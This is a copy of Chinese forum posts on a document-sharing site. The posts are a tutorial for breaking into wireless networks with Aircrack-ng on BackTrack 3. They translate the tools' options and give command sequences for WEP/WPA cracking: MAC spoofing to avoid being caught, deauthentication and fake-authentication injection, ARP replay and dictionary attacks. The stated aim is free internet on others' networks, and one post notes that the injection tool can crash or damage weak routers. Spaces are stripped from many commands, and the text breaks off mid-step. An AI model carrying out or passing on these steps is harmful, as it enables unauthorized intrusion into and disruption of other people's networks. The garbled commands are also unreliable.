无线破解攻击工具使用详解.docx
- 文档编号:11667329
- 上传时间:2023-03-29
- 格式:DOCX
- 页数:37
- 大小:77.50KB
无线破解攻击工具使用详解.docx
《无线破解攻击工具使用详解.docx》由会员分享,可在线阅读,更多相关《无线破解攻击工具使用详解.docx(37页珍藏版)》请在冰豆网上搜索。
无线破解攻击工具使用详解
无线破解攻击工具使用详解
无线破解攻击工具使用详解
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下linux命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造MAC
iwconfig 主要针对无线网卡的工具(同ifconfig)
iwlist 获取无线网络的更详细信息
另外还有其他的linux基本命令,我就不提示了。
具体破解步骤:
1.修改无线网卡状态:
先down掉
2.伪造无线网卡的MAC地址:
安全起见,减少被抓到的可能
3.修改网卡工作模式:
进入Monitor状态,会产生一个虚拟的网卡
4.修改无线网卡状态:
up
5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标
6.监听抓包:
生成.cap或.ivs
7.干扰无线网络:
截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8.破解 .cap或.ivs ,获得WEP密码,完成破解
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
1.ifconfig
用来配置网卡,我们这里主要用来禁用和启用网卡:
ifconfigath0down
ifconfigath0up
禁用一下网卡的目的是为了下一步修改MAC。
2.macchanger
用来改变网卡的MAC地址,具体用法如下:
usage:
macchanger[options]device
-h显示帮助
-V显示版本
-s显示当前MAC
-e不改变mac,使用硬件厂商写入的MAC
-a自动生成一个同类型的MAC,同厂商的
-A自动生成一个不同类型的MAC,不同厂商的
-r生成任意MAC
-l显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m设置一个自定义的MAC 如:
macchanger--mac=00:
34:
00:
00:
00:
00ath0。
3.airmon-ng
启动无线网卡进入Monitor模式,
useage:
airmon-ng
[channel] 监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了
4.iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:
iwconfiginterface[options]
[essid{NN|ON|OFF}] 指定essid号开启关闭
[nwid{NN|on|off}] 指定网络id号开启关闭
[mode{managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freqN.NNNN[K|M|G]] 指定工作频率
[channelN] 指定频道
[ap{N|off|auto}] 指定AP号关闭/自动
[sensN] sens号
[nickN] nick号
[rate{N|auto|fixed}] 速率控制
[rts{N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag{N|auto|fixed|off}] 碎片控制
[enc{NNNN-NNNN|off}] 范围
[power{periodN|timeoutN}] 电源频率/超时
[retry{limitN|lifetimeN}] 重试限次/超时
[txpowerN{mw|dBm}] 功率毫瓦/分贝
[commit] 处理
5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage:
iwlist[interface]options
scanning 扫描
frequency 频率
channel 频道
bitrate 速率
rate 速率
encryption 加密
key 密钥
power 电源
txpower 功率
ap ap
accespoints ap
peers 直连
event 事件
6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage:
airodump-ng
Options:
--ivs :
仅将抓取信息保存为.ivs
--gpsd :
使用GPSd
--write
保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w :
同--write
--beacons :
保存所有的beacons,默认情况况下是丢弃那些无用的数据包的
--update
显示更新延迟,没有用过
--showack :
显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h :
隐藏已知的,配合上面的选项使用
-f
跳频时间
--berlin
无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)
-r
从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵
Filteroptions:
--encrypt
使用密码序列过滤AP
--netmask
使用掩码过滤AP
--bssid
使用bssid过滤AP
-a :
过滤无关的客户端
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:
--channel
指定频道
--band
制定带宽
-C
指定频率MHz
--cswitch
设置频道交换方式
0 :
FIFO(default) 先进先出(默认)
1 :
RoundRobin 循环
2 :
Hoponlast 最后一跳
-s :
同上
--help :
显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文
7.aireplay-ng
搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.
usage:
aireplay-ng
Filteroptions:
-bbssid :
AP的MAC
-ddmac :
目标的MAC
-ssmac :
来源的MAC
-mlen :
最小包长度
-nlen :
最大包长度
-utype :
帧控制,type field
-vsubt :
帧控制,subtypefield
-ttods :
帧控制,To DSbit
-ffromds:
帧控制,From DSbit
-wiswep :
帧控制,WEP bit
-D :
禁用AP发现功能
Replayoptions:
-xnbpps :
每秒包数量
-pfctrl :
框架设定(hex)
-abssid :
设置AP的mac
-cdmac :
设置目标的MAC
-hsmac :
设置来源的mac
-gvalue :
改变环缓存大小(默认8)
-F :
选择第一个匹配的包
Fakeauthattackoptions:
-eessid :
设置目标AP的SSID
-onpckts:
每秒爆破的包数量(0自动,默认1)
-qsec :
存活时间秒
-yprga :
共享可信的key流
ArpReplayattackoptions:
-j :
注入fromDS数据包,还没有用过这个选项
Fragmentationattackoptions:
-kIP :
设置目的IP碎片
-lIP :
设置源IP碎片
Testattackoptions:
-B :
激活bitrate测试
sourceoptions:
-iiface :
设置抓包的接口设备
-rfile :
从pcap文件析取数据包
attackmodes(Numberscanstillbeused):
攻击模式,最具杀伤力的地方
--deauth count:
不信任一切 (-0)
--fakeauth delay:
欺骗AP的信任 (-1)
--interactive :
交互的选择 (-2)
--arpreplay :
标准的ARP-requestreplay (-3)
--chopchop :
解密WEP包 (-4)
--fragment :
生成有效的key流 (-5)
--caffe-latte :
从客户端获取新的IVs (-6)
--cfrag :
对客户端进行碎片攻击 (-7)
--test :
测试注射及效果 (-9)
--help :
显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.
8.aircrack-ng
破解KEY,漫长的过程.漫不漫长取决于两个方面:
一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.
usage:
aircrack-ng[options]<.cap/.ivsfile(s)>
Commonoptions:
-a
暴破(1/WEP,2/WPA-PSK)
-e
选择essid为目标
-b
选择ap的mac为目标,就是破解识别的关键字
-q :
使用安静模式,无数出模式
-C
将所有的AP合并为一个虚拟的
StaticWEPcrackingoptions:
-c :
仅搜索字母数字
-t :
仅搜索二进制
-h :
搜索数字关键字(用于坏掉的部分),翻译不出来了
-d
指定掩码(A1:
XX:
CF:
YY)
-m
用MAC匹配可用的数据包
-n
WEP长度 64/128/152/256/512
-i
WEP索引(1to4),default:
any
-f
暴破强度默认2,原文字面意思是"禽兽强迫捏造事实",呵呵
-k
禁用一种破解方式(1to17)
-xor-x0 :
禁用最新关键字暴破
-x1 :
使用最新关键字暴破默认
-x2 :
用最新两个字节暴破
-y :
实验单线程模式
-K :
KoreK攻击(pre-PTW)
-s :
显示为ASCII
-M
最大数量ivs使用
-D :
WEP非隐蔽模式
-P
PTWdebug:
1disableKlein,2PTW
-1 :
尝试一次PTW
WEPandWPA-PSKcrackingoptions:
-w
指定目录文件,可以多个
-r
制定airolib-ng数据库,不能和-w一起使用
--help :
显示这个帮助
说明:
好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:
mhy_mhy.
下面以我的硬件实例来操作一下:
我的硬件是atheros的a/b/g无线网卡,在linux中显示为ath0,我只列出我常用的命令步骤,不再做任何解释:
ifconfigath0down
macchanger-rath0
macchanger-rwifi0
ifconfigath1up
airmon-ngstartath16
iwconfigath1
iwlistath1scanning
airodump-ng-w*.cap-c6ath1
aireplay-ng-10-eap_essid-aap_mac-hXXXXXXXXXXath1
aireplay-ng-5-bap_mac-hXXXXXXXXXXath1
aireplay-ng-3-bap_mac-hXXXXXXXXXX-x 1024 ath1
aireplay-ng-01-a00:
00:
00:
00:
00:
00-cBB:
BB:
BB:
BB:
BB:
BBath1
aireplay-ng-3-b
aircrack-ng-x-f2*.cap
aircrack-ng-wpassdict.txt*.cap
aircrack-ng-n64-bapmac*.ivs
aircrack-ng-wpassdict.txt-b00:
00:
00:
00:
00:
00*.cap
UID
226883
帖子
981
精华
0
小红点
8410
阅读权限
50
在线时间
110小时
注册时间
2008-7-20
最后登录
2009-7-8
查看详细资料TOP
xuhl196
高级工程师
∙发短消息
∙加为好友
当前在线2#大中小发表于2009-7-815:
31 只看该作者
本文主要是针对无线网络的密码破解,使用平台linux2.26.21.5,实现环境BACKTRACK3FINAL(USB),无线破解工具Aircrack-ng,官方网站http:
//www.aircrack-ng.org,Aircrack-ng系列工具也有windows平台版本,但是本人的小黑的始终不能在win下抓包,所以只能弃win从lin了,另外win下扫描到的AP也比lin下少了很多。
其实WIN并不完整的支持TCP/IP协议族,有些协议win直接丢弃不用。
网络本来从一开始就是unix的天下,win只是在后来加入了网络的功能。
UID
226883
帖子
981
精华
0
小红点
8410
阅读权限
50
在线时间
110小时
注册时间
2008-7-20
最后登录
2009-7-8
查看详细资料TOP
xuhl196
高级工程师
∙发短消息
∙加为好友
∙当前在线
3#大中小发表于2009-7-815:
37 只看该作者
1、确定你所要破解的无线加密方式是WEP还是WPA?
WEP很容易。
WPA嘛,就难了。
所以WEP的你完全可以看些资料轻松的破解了,让自己免费上起网来。
2、需确定你的无线网卡是否有支持破解的软件,现在用得比较多的是BT3软件(本站附有BT3软件下载哦,这个在网上很难找到能下载的呢)。
你可以查一下BT3所支持的无线网卡列表。
建议不要在windows下破解,太浪劲了。
3、确定可以破解后,(以BT3为例)制作BT3光盘,或BT3U盘启动或从硬盘启动BT3。
下面就来具体说说吧:
首先是我自己写的一个教程,全命令行形式的,大家可能看了有点迷糊,不急,下面会再给大家一个转载的图文并茂的bt3教程的(BT3下破解无线网络)。
首先下载BT3(BackTrack3)操作系统(自己到本站最好的软件类找去)ISO光盘版的,刻录完就好了,(或者你在虚拟机内试验,用虚拟光驱就行了,PS本站有虚拟机程序下载和虚拟光驱下载)不提了。
我们谈下USB版的吧,因为USB操作起来比光盘版的稍微复杂一点,我们会了难的,还不会简单的么?
USB版的,随便解压缩到某个U盘的根目录,这样,根目录下有BT3和Boot两个文件夹。
打开一个DOS窗口,指向你的U盘目录,比如是H盘,那么
———运行———
H:
+回车
cdboot
bootinst.bat
按提示,确认你的确是在你的U盘的目录下操作。
然后OK了。
重启时插入U盘即可启动,如果有任何问题,请确认你的电脑打开了U盘启动,并且被放在第一启动项(ThinkPad可以指定排除某个启动项的,请检查)
或者在启动时按住F12,选择U盘启动。
如果是硬盘启动,虽然有很多办法,但是为了VISTA和XP的兼容,个人推荐DOS启动法,即先弄一个DOS的启动,比如弄一个MouseDOS一类的,傻瓜安装,可以让电脑启动进入纯DOS状态,然后在DOS情况下,进入硬盘上解压出的那个Boot目录里面,里面有个DOS目录,然后执行BT3.bat即可。
建议在执行BT3.bat前,先运行一下Smartdrv.exe,可以加快启动速度很多。
(附件里有Smartdrv.exe98版)
小提示:
DOS下的启动,不会自动进入图形界面,可以通过编辑DOS目录里面的CONFIG文件来实现:
只需要在CONFIG里面,最后加上一句:
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的Autoexec.bat文件,直接加上:
smartdrv.exe
D:
cdboot
cddos
bt3.bat
这样启动直接进入了图形界面。
这时候的BT3,是全部在内存里的,也就是说,在系统内,任何对桌面和配置的改动都不会被记录,所以如果要记录文档,请不要放在桌面上。
———————————破解—————————————
以下是破解过程
WEP破解
1)ifconfig-a
2)airmon-ngstartwifi06
3)airodump-ng--ivs-wname-c6ath1
4)aireplay-ng-10-eap_essid-aap_mac-hXXXXXXXXXXath1
-1is-one
5)aireplay-ng-5-bap_mac-hXXXXXXXXXXath1
新的第5步:
a
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 无线 破解 攻击 工具 使用 详解